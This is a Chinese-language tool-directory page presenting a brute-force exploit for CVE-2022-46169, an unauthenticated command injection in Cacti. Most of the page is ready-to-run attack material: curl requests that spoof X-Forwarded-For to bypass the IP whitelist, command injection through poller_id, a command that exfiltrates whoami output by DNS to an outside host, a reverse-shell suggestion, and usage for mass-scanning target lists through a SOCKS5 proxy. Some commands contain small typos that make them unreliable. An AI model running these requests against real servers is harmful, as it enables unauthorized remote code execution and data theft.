Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-46169 — CVE-2022-46169 - Cacti 未授权盲远程代码执行 | Kitploit
工具/GitHubGitHub/taythebot/cve-2022-46169
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队
GitHubtaythebot/cve-2022-46169

CVE-2022-46169

CVE-2022-46169 - Cacti 未授权盲远程代码执行

查看仓库
123年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-46169

Cacti 盲远程代码执行(预认证)

免责声明

本内容仅供教育目的使用。我不对你的行为负责。请自行斟酌使用。

说明

该脚本暴力破解利用此漏洞所需的变量。此漏洞利用需要以下 3 个变量:

  • 白名单 IP 地址
  • 正确的 host_id 参数
  • 正确的 local_data_ids 参数

文件 remote_agent.php 受 IP 白名单保护。你可以通过在 X-Forwarded-IP 头中伪造你的 IP 地址来绕过此保护。大多数实例会将 127.0.0.1 或服务器自身的 IP 地址加入白名单。

接下来,你需要暴力破解 host_id 和 local_data_ids 请求参数。通过从默认最小值 1 到最大值 10 枚举整数对 x,y 来完成。

示例请求

root@kitploit:~
pair_x="1"
pair_y="2"
curl -k -H "X-Forwarded-For: 127.0.0.1" \
    "https://target.com/cacti/remote_agent.php?action=polldata&poller_id=1&host_id=$pari_x&=local_data_ids[]=$pair_y"

[]

漏洞利用

获得这 3 个变量后,你可以在 poller_id 键中注入 shell 命令,并在命令前添加 ; 进行转义。

这是一个盲 RCE,因此你需要将命令输出发送到像 interact.sh 这样的地方,或打开一个反向 shell。记得对 poller_id 值进行 URL 编码!

以下命令执行 ping $(whoami).test.com

root@kitploit:~
curl -k -H "X-Forwarded-For: 127.0.0.01" \
    "https://target.com/cacti/remote_agent.php?action=polldata&host_id=1&local_data_ids[]=3&poller_id=;ping%20%24%28whoami%29.test.com"

输出

脚本以 CSV 格式输出。表头为 "target", "ip", "host_id", "data_id", "url"。

如果 url 值缺失,则表示脚本能够绕过 IP 限制,但未能成功暴力破解 ID。你可以使用此输出并设置更高的最大值再次尝试。

解析输出

你可以使用以下命令快速解析输出文件

已绕过 IP 限制的目标

root@kitploit:~
tail -n +2 results.csv | cut -d ',' -f1 | sort -u

可被利用的目标

root@kitploit:~
tail -n +2 results.csv | cut -d ',' -f5 | sort -u 

构建

root@kitploit:~
go build -v -o bruteforce bruteforce.go

用法

root@kitploit:~
./bruteforce -l targets.txt -t 50 -min 1 -max 10
  • 目标必须是 IP 地址列表,端口可以省略
  • 支持 Socks5 代理 -proxy socks5://127.0.0.1:9050
  • 默认输出文件为 results.csv
下载工具